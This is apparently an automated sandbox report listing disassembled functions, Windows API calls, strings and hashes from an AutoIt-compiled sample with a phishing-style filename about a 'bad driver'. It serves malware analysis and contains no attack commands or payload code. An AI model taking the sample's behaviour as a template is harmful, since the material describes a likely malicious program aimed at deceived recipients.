Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 25b825840a2bde6fb82665a20e622eb2ea5e2637eebc31014c075894fa500282
Instruction ID: 09b0ddef23b90f26c1714959aea089798ee80b946e004bfdced47240c8379b8f
Opcode Fuzzy Hash: 25b825840a2bde6fb82665a20e622eb2ea5e2637eebc31014c075894fa500282
Instruction Fuzzy Hash: 4471BE71550605AFD724CF28CC4AFAA7BF5FB88300F08492DF995872A1D7B0EA56CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00C3C8EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB2612: GetWindowLongW.USER32(?,000000EB), ref: 00BB2623

DragQueryPoint.SHELL32(?,?), ref: 00C3C917

Part of subcall function 00C3ADF1: ClientToScreen.USER32(?,?), ref: 00C3AE1A
Part of subcall function 00C3ADF1: GetWindowRect.USER32(?,?), ref: 00C3AE90
Part of subcall function 00C3ADF1: PtInRect.USER32(?,?,00C3C304), ref: 00C3AEA0

SendMessageW.USER32(?,000000B0,?,?), ref: 00C3C980
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00C3C98B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00C3C9AE
_wcscat.LIBCMT ref: 00C3C9DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00C3C9F5
SendMessageW.USER32(?,000000B0,?,?), ref: 00C3CA0E
SendMessageW.USER32(?,000000B1,?,?), ref: 00C3CA25
SendMessageW.USER32(?,000000B1,?,?), ref: 00C3CA47
DragFinish.SHELL32(?), ref: 00C3CA4E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00C3CB41

Strings

@GUI_DRAGFILE, xrefs: 00C3CAF0
@GUI_DRAGID, xrefs: 00C3CAB9
@GUI_DROPID, xrefs: 00C3CA6E

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: 083f84982832279d23f7e97a2e5112855d24d89b159f997ccd4f619109f506cf
Instruction ID: 476b5e4db4fac1c32469c3977b635e530ff3c13db47f6458a61173ec31c47559
Opcode Fuzzy Hash: 083f84982832279d23f7e97a2e5112855d24d89b159f997ccd4f619109f506cf
Instruction Fuzzy Hash: C3614971518300AFC711EF64DC85EAFBBF8EF89710F000A6EF595A61A1DB709A49CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00C34619 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00C346AB
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C346F6

Strings

CHECK, xrefs: 00C34716
UNCHECK, xrefs: 00C348D2
GETTOTALCOUNT, xrefs: 00C346DD
COLLAPSE, xrefs: 00C3473C
EXPAND, xrefs: 00C347A8
EXISTS, xrefs: 00C3475F
GETTEXT, xrefs: 00C34849
GETSELECTED, xrefs: 00C34806
GETITEMCOUNT, xrefs: 00C347D8
SELECT, xrefs: 00C348A7
ISCHECKED, xrefs: 00C34879

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: d45ddcddeffa54334e28eca9315c35fbf97e0ddbd0307ab72139f63117b47b43
Instruction ID: 3cd34f3543586a221941f324bf7a4e2b9d1e6e1f0bda1861e6d2b27b89fd161b
Opcode Fuzzy Hash: d45ddcddeffa54334e28eca9315c35fbf97e0ddbd0307ab72139f63117b47b43
Instruction Fuzzy Hash: 689160742147019BCB18EF20C451ABEB7E6AF45314F0444ADF8969B3A2DB70FD46CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00C3BAB8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00C3BB6E
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00C39431), ref: 00C3BBCA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00C3BC03
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00C3BC46
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00C3BC7D
FreeLibrary.KERNEL32(?), ref: 00C3BC89
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00C3BC99
DestroyIcon.USER32(?,?,?,?,?,00C39431), ref: 00C3BCA8
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00C3BCC5
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00C3BCD1

Part of subcall function 00BD313D: __wcsicmp_l.LIBCMT ref: 00BD31C6

Strings

.dll, xrefs: 00C3BB27
.exe, xrefs: 00C3BB04
.icl, xrefs: 00C3BAE4

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 216b3af2b818c599f2d5e61f13f834762ffbcd713facce3b80a594f0abe6a2f8
Instruction ID: 2e17ba853b1279e4dd3c27a0249954d6992695abbf0bf81cb0a15f445b20cfbc
Opcode Fuzzy Hash: 216b3af2b818c599f2d5e61f13f834762ffbcd713facce3b80a594f0abe6a2f8
Instruction Fuzzy Hash: FA61F471910619BBEB24DF64DC41FBEB7A8EF08710F10451AFA25D61C0DB709E80CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C1A5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00BB9997: __itow.LIBCMT ref: 00BB99C2
Part of subcall function 00BB9997: __swprintf.LIBCMT ref: 00BB9A0C

CharLowerBuffW.USER32(?,?), ref: 00C1A636
GetDriveTypeW.KERNEL32 ref: 00C1A683
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C1A6CB
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C1A702
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C1A730

Part of subcall function 00BB7D2C: _memmove.LIBCMT ref: 00BB7D66

Strings

close, xrefs: 00C1A63C
open , xrefs: 00C1A692
type cdaudio alias cd wait, xrefs: 00C1A6AE
wait, xrefs: 00C1A6ED
open, xrefs: 00C1A65D
close cd wait, xrefs: 00C1A71B
closed, xrefs: 00C1A64A, 00C1A653
set cd door , xrefs: 00C1A6D1

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: b5135a6602d86f424187c38ce508ed9145f508d4f770349b19542f1a37d07527
Instruction ID: 25ee34099dfcc2c0e99c437336557f6b1223a7b13dcac34e1da2bb073fe68014
Opcode Fuzzy Hash: b5135a6602d86f424187c38ce508ed9145f508d4f770349b19542f1a37d07527
Instruction Fuzzy Hash: 1E516C711047049FC710EF20C8819AAB7F8FF85718F0449ADF896672A1DB71EE0ACB92

Uniqueness

Uniqueness Score: -1.00%

Function 00C1A45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00C1A47A
__swprintf.LIBCMT ref: 00C1A49C
CreateDirectoryW.KERNEL32(?,00000000), ref: 00C1A4D9
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00C1A4FE
_memset.LIBCMT ref: 00C1A51D
_wcsncpy.LIBCMT ref: 00C1A559
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00C1A58E
CloseHandle.KERNEL32(00000000), ref: 00C1A599
RemoveDirectoryW.KERNEL32(?), ref: 00C1A5A2
CloseHandle.KERNEL32(00000000), ref: 00C1A5AC

Strings

\??\%s, xrefs: 00C1A496
\, xrefs: 00C1A4B2
:, xrefs: 00C1A4BD

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 43d776a414c7f9ae31b25c65b54799c169164c51cf48e8051a7184e3a53a53b9
Instruction ID: 5609ce3c1ca728435e50e0b85e428fe1efc1158aa6d7bdc64d4b7f754f23e785
Opcode Fuzzy Hash: 43d776a414c7f9ae31b25c65b54799c169164c51cf48e8051a7184e3a53a53b9
Instruction Fuzzy Hash: A7318DB5900109ABDB219FA0DC49FEF73BDEF89701F1041BAF918D2160E77097859B25

Uniqueness

Uniqueness Score: -1.00%

Function 00C1DB04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 00C1DC7B
_wcscat.LIBCMT ref: 00C1DC93
_wcscat.LIBCMT ref: 00C1DCA5
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C1DCBA
SetCurrentDirectoryW.KERNEL32(?), ref: 00C1DCCE
GetFileAttributesW.KERNEL32(?), ref: 00C1DCE6
SetFileAttributesW.KERNEL32(?,00000000), ref: 00C1DD00
SetCurrentDirectoryW.KERNEL32(?), ref: 00C1DD12

Strings

*.*, xrefs: 00C1DD51

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: 7a3e1b06e414d55811121ef79ab8306ee84636f933d37efe70d11d5268a02c7d
Instruction ID: 95b36586e9f2b57d5e9d2e02e6a856a1373bc6ddd45bc15f1d917bcd681c83f5
Opcode Fuzzy Hash: 7a3e1b06e414d55811121ef79ab8306ee84636f933d37efe70d11d5268a02c7d
Instruction Fuzzy Hash: B98195715083419FC724EF24C8859EAB7E4BB8A310F158C6EF497C7251E770DA85DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00C3C49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB2612: GetWindowLongW.USER32(?,000000EB), ref: 00BB2623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00C3C4EC
GetFocus.USER32 ref: 00C3C4FC
GetDlgCtrlID.USER32(00000000), ref: 00C3C507
_memset.LIBCMT ref: 00C3C632
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00C3C65D
GetMenuItemCount.USER32(?), ref: 00C3C67D
GetMenuItemID.USER32(?,00000000), ref: 00C3C690
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00C3C6C4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00C3C70C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C3C744
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00C3C779

Strings

0, xrefs: 00C3C62A

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 734f63313b54ab74a88319dd9d05ec96f0e21b1ccc6df7e85525d2131f07335a
Instruction ID: 2febc6a2f87b55b060a3fd0801dd23002ef3c625604fcce1d140a36cf6e645fa
Opcode Fuzzy Hash: 734f63313b54ab74a88319dd9d05ec96f0e21b1ccc6df7e85525d2131f07335a
Instruction Fuzzy Hash: 82817E706183019FD710DF24C9C5AAFBBE4FB89354F00492DF9A9A7291D770D905DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00C083F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C0874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C08766
Part of subcall function 00C0874A: GetLastError.KERNEL32(?,00C0822A,?,?,?), ref: 00C08770
Part of subcall function 00C0874A: GetProcessHeap.KERNEL32(00000008,?,?,00C0822A,?,?,?), ref: 00C0877F
Part of subcall function 00C0874A: HeapAlloc.KERNEL32(00000000,?,00C0822A,?,?,?), ref: 00C08786
Part of subcall function 00C0874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C0879D

Part of subcall function 00C087E7: GetProcessHeap.KERNEL32(00000008,00C08240,00000000,00000000,?,00C08240,?), ref: 00C087F3
Part of subcall function 00C087E7: HeapAlloc.KERNEL32(00000000,?,00C08240,?), ref: 00C087FA
Part of subcall function 00C087E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00C08240,?), ref: 00C0880B

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C08458
_memset.LIBCMT ref: 00C0846D
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C0848C
GetLengthSid.ADVAPI32(?), ref: 00C0849D
GetAce.ADVAPI32(?,00000000,?), ref: 00C084DA
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C084F6
GetLengthSid.ADVAPI32(?), ref: 00C08513
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00C08522
HeapAlloc.KERNEL32(00000000), ref: 00C08529
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C0854A
CopySid.ADVAPI32(00000000), ref: 00C08551
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C08582
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C085A8
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C085BC

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: d4a2273b8c3af92ec8acb2ca975aca1765804d113e58ae7bb4f5d2ead6501495
Instruction ID: a884264693ec3562bd4193ea18c552e18b4972d82f455ecfd7dd2f3b466609e2
Opcode Fuzzy Hash: d4a2273b8c3af92ec8acb2ca975aca1765804d113e58ae7bb4f5d2ead6501495
Instruction Fuzzy Hash: E061387190020AAFDF14DFA4DC45AEEBBB9FF04300F14856AF965A7291DB319A19CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00C2762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00C276A2
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00C276AE
CreateCompatibleDC.GDI32(?), ref: 00C276BA
SelectObject.GDI32(00000000,?), ref: 00C276C7
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00C2771B
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00C27757
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00C2777B
SelectObject.GDI32(00000006,?), ref: 00C27783
DeleteObject.GDI32(?), ref: 00C2778C
DeleteDC.GDI32(00000006), ref: 00C27793
ReleaseDC.USER32(00000000,?), ref: 00C2779E

Strings

(, xrefs: 00C27723

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 977af63b96a996f40e32980f380f2c6881521189717e5ecef3778d48b26bccc1
Instruction ID: bd2977dab66cc198499df4f0b2df357eff604e507980dd69afdbbf346999039a
Opcode Fuzzy Hash: 977af63b96a996f40e32980f380f2c6881521189717e5ecef3778d48b26bccc1
Instruction Fuzzy Hash: 7C516775904219EFCB15CFA8DC89FAEBBB9EF48710F10892DF95A97210D731A9418B60

Uniqueness

Uniqueness Score: -1.00%

Function 00C1A0B5 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00C3FB78), ref: 00C1A0FC

Part of subcall function 00BB7F41: _memmove.LIBCMT ref: 00BB7F82

LoadStringW.USER32(?,?,00000FFF,?), ref: 00C1A11E
__swprintf.LIBCMT ref: 00C1A177
__swprintf.LIBCMT ref: 00C1A190
_wprintf.LIBCMT ref: 00C1A246
_wprintf.LIBCMT ref: 00C1A264

Strings

^ ERROR, xrefs: 00C1A1E8
Line %d (File "%s"):, xrefs: 00C1A171, 00C1A18A
"%s" (%d) : ==> %s:, xrefs: 00C1A25F
"%s" (%d) : ==> %s:%s%s, xrefs: 00C1A241
Error: , xrefs: 00C1A20E

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-2391861430
Opcode ID: 75df3ebebfd8932bed52ac379148faeb89e7e8437d4bf20cf358018d1c7bf4e9
Instruction ID: e32ab089dc43b4b040e2c0fc0978a5ec72083a6f5e01f75f278081c5785ace2a
Opcode Fuzzy Hash: 75df3ebebfd8932bed52ac379148faeb89e7e8437d4bf20cf358018d1c7bf4e9
Instruction Fuzzy Hash: A3514C71940109ABCF25EBA0CD86EFEB7B9AF05300F1001A5F519721A2EB716F99DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00BB6BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00BD0B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00BB6C6C,?,00008000), ref: 00BD0BB7

Part of subcall function 00BB48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BB48A1,?,?,00BB37C0,?), ref: 00BB48CE

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00BB6D0D
SetCurrentDirectoryW.KERNEL32(?), ref: 00BB6E5A

Part of subcall function 00BB59CD: _wcscpy.LIBCMT ref: 00BB5A05

Part of subcall function 00BD387D: _iswctype.LIBCMT ref: 00BD3885

Strings

Unterminated string, xrefs: 00BEEC0D
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00BEE84A
Error opening the file, xrefs: 00BEE866, 00BEE8E1
AU3!, xrefs: 00BB6CC1
Bad directive syntax error, xrefs: 00BEEBC6
>>>AUTOIT SCRIPT<<<, xrefs: 00BEE8BF
EA06, xrefs: 00BEE87B

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: 4e747fb518aba55b1d25d2d9bf8712334a6ae96ab6b9584ecadf539642ae1a05
Instruction ID: ee8b4c37bd1dd633e3ce82194884c306272992183f2a920f3ffb84873a5b4517
Opcode Fuzzy Hash: 4e747fb518aba55b1d25d2d9bf8712334a6ae96ab6b9584ecadf539642ae1a05
Instruction Fuzzy Hash: 94027B301083819FC724EF24C891AAFBBE5FF99314F1409ADF496972A1DBB0D949DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00BB45DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00BB45F9
GetMenuItemCount.USER32(00C76890), ref: 00BED7CD
GetMenuItemCount.USER32(00C76890), ref: 00BED87D
GetCursorPos.USER32(?), ref: 00BED8C1
SetForegroundWindow.USER32(00000000), ref: 00BED8CA
TrackPopupMenuEx.USER32(00C76890,00000000,?,00000000,00000000,00000000), ref: 00BED8DD
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00BED8E9

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 2751501086-0
